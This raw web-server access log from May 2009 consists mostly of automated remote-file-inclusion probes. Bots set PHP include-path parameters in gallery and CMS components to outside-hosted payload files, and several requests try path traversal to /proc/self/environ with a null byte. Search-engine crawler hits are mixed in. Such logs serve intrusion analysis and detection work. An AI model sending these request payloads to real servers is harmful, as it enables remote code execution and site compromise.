67.139.134.211 - - [27/May/2009:22:07:08 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:22:07:29 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:22:07:29 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
91.121.18.203 - - [27/May/2009:22:07:38 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
91.121.18.203 - - [27/May/2009:22:07:38 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
72.52.230.102 - - [27/May/2009:22:07:50 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
72.52.230.102 - - [27/May/2009:22:07:50 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.15.28.165 - - [27/May/2009:22:08:19 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:22:08:19 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
80.237.146.58 - - [27/May/2009:22:08:27 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.76"
80.237.146.58 - - [27/May/2009:22:08:27 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.76"
74.208.64.7 - - [27/May/2009:22:08:52 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
74.208.64.7 - - [27/May/2009:22:08:52 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
220.181.7.97 - - [27/May/2009:22:09:10 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.193.210.232 - - [27/May/2009:22:09:17 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.814"
216.193.210.232 - - [27/May/2009:22:09:17 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.814"
202.70.83.4 - - [27/May/2009:22:11:09 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
202.70.83.4 - - [27/May/2009:22:11:11 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
218.249.36.194 - - [27/May/2009:22:13:33 -0500] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
218.249.36.194 - - [27/May/2009:22:13:34 -0500] "GET //upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
67.139.134.211 - - [27/May/2009:22:15:04 -0500] "GET /logs/http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
67.139.134.211 - - [27/May/2009:22:15:04 -0500] "GET /http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
72.52.230.102 - - [27/May/2009:22:15:13 -0500] "GET /logs/http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
72.52.230.102 - - [27/May/2009:22:15:13 -0500] "GET /http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
91.121.18.203 - - [27/May/2009:22:15:18 -0500] "GET /logs/http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
91.121.18.203 - - [27/May/2009:22:15:18 -0500] "GET /http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
218.249.36.194 - - [27/May/2009:22:16:29 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://jamur.3dn.ru/id.txt? HTTP/1.1" 200 191101 "-""libwww-perl/5.79"
218.249.36.194 - - [27/May/2009:22:16:30 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jamur.3dn.ru/id.txt? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
218.249.36.194 - - [27/May/2009:22:16:42 -0500] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
218.249.36.194 - - [27/May/2009:22:16:42 -0500] "GET //upgrade_album.php?GALLERY_BASEDIR=http://jamur.3dn.ru/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
80.237.146.58 - - [27/May/2009:22:17:25 -0500] "GET /logs/http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.76"
80.237.146.58 - - [27/May/2009:22:17:26 -0500] "GET /http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.76"
173.15.28.165 - - [27/May/2009:22:17:59 -0500] "GET /logs/http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:22:17:59 -0500] "GET /http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
216.193.210.232 - - [27/May/2009:22:19:00 -0500] "GET /logs/http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.814"
216.193.210.232 - - [27/May/2009:22:19:00 -0500] "GET /http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
86.122.170.50 - - [27/May/2009:22:19:04 -0500] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.irisjobstation.com/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
86.122.170.50 - - [27/May/2009:22:19:04 -0500] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.irisjobstation.com/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
110.45.145.92 - - [27/May/2009:22:20:56 -0500] "GET /logs/access_log.1239753600//upgrade_album.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
110.45.145.92 - - [27/May/2009:22:20:56 -0500] "GET //upgrade_album.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
110.45.145.92 - - [27/May/2009:22:20:56 -0500] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
110.45.145.92 - - [27/May/2009:22:21:22 -0500] "GET /logs/access_log.1239494400//upgrade_album.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.106.109 - - [27/May/2009:22:22:39 -0500] "GET /logs/access_log.1116720000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.208.64.7 - - [27/May/2009:22:23:39 -0500] "GET /logs/http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
74.208.64.7 - - [27/May/2009:22:23:40 -0500] "GET /http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
58.227.193.198 - - [27/May/2009:22:25:13 -0500] "GET /logs/index.php?meio.php=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
58.227.193.198 - - [27/May/2009:22:25:13 -0500] "GET /logs/access_log.1242086400/index.php?meio.php=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
58.227.193.198 - - [27/May/2009:22:25:13 -0500] "GET /logs/access_log.1240012800/index.php?meio.php=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
58.227.193.198 - - [27/May/2009:22:25:13 -0500] "GET /index.php?meio.php=http://tulokera.com/home/copyright.txt???? HTTP/1.1" 404 292 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:22:31:30 -0500] "GET /logs/access_log.1237766400/errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:22:31:30 -0500] "GET /logs/access_log.1230768000/errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:22:31:30 -0500] "GET /logs/errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:22:31:30 -0500] "GET /errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:22:34:08 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:22:34:08 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:22:34:08 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:22:35:37 -0500] "GET /logs/access_log.1238889600/s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
66.175.122.228 - - [27/May/2009:22:37:03 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.175.122.228 - - [27/May/2009:22:37:03 -0500] "GET /?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:37:30 -0500] "GET /errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:37:31 -0500] "GET /logs/access_log.1237766400/errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:37:33 -0500] "GET /logs/errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.175.122.228 - - [27/May/2009:22:37:35 -0500] "GET /logs/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:37:39 -0500] "GET /logs/access_log.1230768000/errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.70.83.4 - - [27/May/2009:22:38:03 -0500] "GET /logs/http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
202.70.83.4 - - [27/May/2009:22:38:04 -0500] "GET /http://127.0.0.1/themes/container.php?theme_directory=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
85.17.162.28 - - [27/May/2009:22:38:26 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:38:26 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:38:27 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
174.143.3.188 - - [27/May/2009:22:38:28 -0500] "GET //?_zb_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
174.143.3.188 - - [27/May/2009:22:38:29 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.143.3.188 - - [27/May/2009:22:38:29 -0500] "GET /logs//?_zb_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 200 191100 "-""Mozilla/5.0"
65.55.106.229 - - [27/May/2009:22:39:09 -0500] "GET /logs/access_log.1118880000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.17.162.28 - - [27/May/2009:22:39:31 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:39:31 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:39:31 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:39:37 -0500] "GET /logs/access_log.1238889600/s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:39:51 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:39:51 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:39:51 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
66.175.122.228 - - [27/May/2009:22:40:46 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:40:59 -0500] "GET /logs/access_log.1238889600/s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:41:18 -0500] "GET /logs/access_log.1238889600/s_loadenv.inc.php?DOCUMENT_ROOT=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:41:34 -0500] "GET /errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:41:36 -0500] "GET /logs/access_log.1237766400/errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:41:37 -0500] "GET /logs/errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:41:39 -0500] "GET /logs/access_log.1230768000/errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:41:42 -0500] "GET /logs/errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:41:42 -0500] "GET /errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:41:42 -0500] "GET /logs/access_log.1237766400/errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [27/May/2009:22:41:46 -0500] "GET /logs/access_log.1230768000/errors.php?error=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
189.14.202.124 - - [27/May/2009:22:41:51 -0500] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
189.14.202.124 - - [27/May/2009:22:41:51 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
189.14.202.124 - - [27/May/2009:22:42:00 -0500] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 191100 "-""Mozilla/5.0"
62.149.163.198 - - [27/May/2009:22:48:40 -0500] "GET /logs/?_zb_path=http://www.sbe.es/buggsbunny?? HTTP/1.1" 200 191095 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
62.149.163.198 - - [27/May/2009:22:48:40 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.149.163.198 - - [27/May/2009:22:48:42 -0500] "GET /logs/?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 191095 "-""XXXXXX"
62.149.163.198 - - [27/May/2009:22:48:43 -0500] "GET /logs/?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 191095 "-""XXXXXX"
62.149.163.198 - - [27/May/2009:22:48:49 -0500] "GET /?_zb_path=http://www.sbe.es/buggsbunny?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.149.163.198 - - [27/May/2009:22:48:49 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
62.149.163.198 - - [27/May/2009:22:48:49 -0500] "GET /?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3245 "-""XXXXXX"
62.149.163.198 - - [27/May/2009:22:48:50 -0500] "GET /?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3245 "-""XXXXXX"
207.182.143.50 - - [27/May/2009:22:52:44 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:22:52:44 -0500] "GET /?sourcedir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:22:52:44 -0500] "GET /logs/?sourcedir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:22:53:00 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:22:53:41 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:22:53:41 -0500] "GET /?sourcedir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:22:53:42 -0500] "GET /logs/?sourcedir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:22:53:54 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.55.106.210 - - [27/May/2009:22:58:39 -0500] "GET /logs/access_log.1126483200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.132 - - [27/May/2009:23:00:40 -0500] "GET /logs/access_log.1126396800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.180 - - [27/May/2009:23:04:09 -0500] "GET /logs/access_log.1182038400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.159.121.30 - - [27/May/2009:23:05:27 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.159.121.30 - - [27/May/2009:23:05:27 -0500] "GET /?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.159.121.30 - - [27/May/2009:23:05:29 -0500] "GET /logs/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
78.159.121.30 - - [27/May/2009:23:05:34 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.249.65.36 - - [27/May/2009:23:10:50 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.65.36 - - [27/May/2009:23:10:50 -0500] "GET /silver_spanish_piece_of_eight.htm HTTP/1.1" 200 2427 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [27/May/2009:23:10:55 -0500] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:23:10:55 -0500] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:23:10:55 -0500] "GET /logs/access_log.1242432000//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.249.65.36 - - [27/May/2009:23:11:02 -0500] "GET /logs/ HTTP/1.1" 200 191095 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.65.36 - - [27/May/2009:23:11:02 -0500] "GET /_vti_cnf/ HTTP/1.1" 200 676 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
86.39.131.85 - - [27/May/2009:23:13:52 -0500] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
86.39.131.85 - - [27/May/2009:23:13:52 -0500] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
86.39.131.85 - - [27/May/2009:23:14:31 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
86.39.131.85 - - [27/May/2009:23:14:31 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
121.130.29.11 - - [27/May/2009:23:15:31 -0500] "GET //RGboard/include/footer.php?_path[counter]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.130.29.11 - - [27/May/2009:23:15:32 -0500] "GET /logs//RGboard/include/footer.php?_path[counter]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.130.29.11 - - [27/May/2009:23:15:32 -0500] "GET /logs/access_log.1242432000//RGboard/include/footer.php?_path[counter]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.130.29.11 - - [27/May/2009:23:15:42 -0500] "GET /logs/access_log.1242172800//RGboard/include/footer.php?_path[counter]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
86.39.131.85 - - [27/May/2009:23:17:11 -0500] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
86.39.131.85 - - [27/May/2009:23:17:11 -0500] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.233.22.209 - - [27/May/2009:23:42:31 -0500] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
211.233.22.209 - - [27/May/2009:23:42:32 -0500] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
216.119.103.12 - - [27/May/2009:23:45:34 -0500] "GET /logs/errors.php?error=http://www.rakkasanwarriors.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
